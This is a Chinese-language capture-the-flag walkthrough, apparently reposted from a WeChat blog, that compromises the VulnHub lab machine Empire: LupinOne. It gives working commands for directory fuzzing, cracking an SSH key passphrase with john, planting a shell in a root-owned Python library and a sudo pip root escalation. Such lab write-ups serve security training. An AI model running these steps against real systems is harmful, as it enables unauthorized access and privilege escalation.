大余每日一攻防EMPIRE: LUPINONE(七)

admin 2023年12月7日21:12:00评论13 views字数 2472阅读8分14秒阅读模式

简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场,为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升,使他们更好地理解实际攻击和防御场景。

每日一攻防特色:环境攻破:以简单直白的方式攻破每日选择的渗透测试环境。代码审计:进行攻防分析,结合代码审计,深入挖掘漏洞和强化防御。

作者:大余

一首歌送给你们,一首歌一攻防一项目!《夜曲》送给大家!

一、网络枚举

大余每日一攻防EMPIRE: LUPINONE(七)自动显示IP地址:192.168.253.129

大余每日一攻防EMPIRE: LUPINONE(七)仅开启了22和80端口。

二、web信息收集

大余每日一攻防EMPIRE: LUPINONE(七)
1701915370_65712aea828143b5901dd.png!small?1701915371220

大余每日一攻防EMPIRE: LUPINONE(七)发现存在/~myfiles目录:大余每日一攻防EMPIRE: LUPINONE(七)404访问错误,开启模糊测试!

三、模糊测试

ffuf是一款Go语言编写的高速Web Fuzzer工具:

ffuf -c -w /usr/share/seclists/Discovery/Web-Content/common.txt -u 'http://192.168.253.129/~FUZZ'

大余每日一攻防EMPIRE: LUPINONE(七)访问:

http://192.168.253.129/~secret/
大余每日一攻防EMPIRE: LUPINONE(七)
1701915387_65712afb1c637b89c2825.png!small?1701915388677

根据提示信息猜测账户名是icex64,并且告诉我们需要使用fasttrack破解他的密匙,猜测这里存在文件存放了密匙,这里采用ffuf进行扫描:

ffuf -c -ic -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u 'http://192.168.253.129/~secret/.FUZZ' -fc 403 -e .txt,.html
大余每日一攻防EMPIRE: LUPINONE(七)
1701915391_65712aff492f78513430a.png!small?1701915393292

获取到.mysecret.txt文件。

四、密码解密

访问访问.mysecret.txt:

http://192.168.253.129/~secret/.mysecret.txt

大余每日一攻防EMPIRE: LUPINONE(七)访问.mysecret.txt文件并对数据进行解密:

https://www.browserling.com/tools/base58-decode

大余每日一攻防EMPIRE: LUPINONE(七)解密成功,获得密匙。

五、id_rsa密码爆破

用kali自带ssh2john生成密码本:

locate ssh2john/usr/share/john/ssh2john.py sshkey > hash
大余每日一攻防EMPIRE: LUPINONE(七)
1701915405_65712b0d5f2ced1099e0e.png!small?1701915406774

john爆破密码文本:

john --wordlist=/usr/share/wordlists/fasttrack.txt hash
大余每日一攻防EMPIRE: LUPINONE(七)
1701915409_65712b1136903cf444cc5.png!small?1701915410819
chmod +x id_rsassh [email protected] -i id_rsaP@55w0rd!
大余每日一攻防EMPIRE: LUPINONE(七)
1701915413_65712b15147ce21d477b9.png!small?1701915414258

六、水平越权提权

查看下heist文件大余每日一攻防EMPIRE: LUPINONE(七)发现通过webbrowser打开了一个连接,查找下webbrowser,但是很多显示没有权限,但是这里想到了sudo -l 中使用的是python3.9,命令:

find /usr -name *webbrowser*

大余每日一攻防EMPIRE: LUPINONE(七)发现webbrowser.py文件:大余每日一攻防EMPIRE: LUPINONE(七)大余每日一攻防EMPIRE: LUPINONE(七)发现是root权限运行的python3的文件,文件中写入shell:

os.system ("/bin/bash")
大余每日一攻防EMPIRE: LUPINONE(七)
1701915434_65712b2a57153881ab160.png!small?1701915435284

再用arsene账户调用/home/arsene/heist.py,获取arsene权限:

sudo -u arsene python3.9 /home/arsene/heist.py
大余每日一攻防EMPIRE: LUPINONE(七)
1701915439_65712b2f38de7ca59192f.png!small?1701915440048

七、提权

发现存在sudo pip提权漏洞,在gtfobins查找利用方式:大余每日一攻防EMPIRE: LUPINONE(七)

https://gtfobins.github.io/gtfobins/pip/
大余每日一攻防EMPIRE: LUPINONE(七)
1701915456_65712b40bc76c0e2f914e.png!small?1701915457633
TF=$(mktemp -d)echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.pysudo pip install $TF

大余每日一攻防EMPIRE: LUPINONE(七)成功获得root权限!

八、代码审计

大余每日一攻防EMPIRE: LUPINONE(七)
1701915466_65712b4a9d2150ca51bc4.png!small?1701915468178

大余每日一攻防EMPIRE: LUPINONE(七)查看源码发现就简单两个html,里面放了一些提示信息罢了,没什么可分析的,明日继续下一个环境。

通过每日一攻防,我致力于共同深探网络安全的奥秘,助力每位参与者成为网络安全领域的技术高手。立即加入大余安全,共同迎接每日新的挑战!


****扫描下方二维码添加小助手,进群和大余老师一起技术探讨交流吧!****

大余每日一攻防EMPIRE: LUPINONE(七)
1701847681_657022811043209291287.png!small?1701847682244

欢迎大家进入大余安全回忆录帮会,每周二&五定期更新《安全开发》、《渗透测试》系列文章,帮助大家从0基础到入门。

大余每日一攻防EMPIRE: LUPINONE(七)
1701847704_65702298ccb7a072cd4c7.png!small?1701847708052


原文始发于微信公众号(大余安全):大余每日一攻防EMPIRE: LUPINONE(七)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月7日21:12:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   大余每日一攻防EMPIRE: LUPINONE(七)https://cn-sec.com/archives/2277310.html

发表评论

匿名网友 填写信息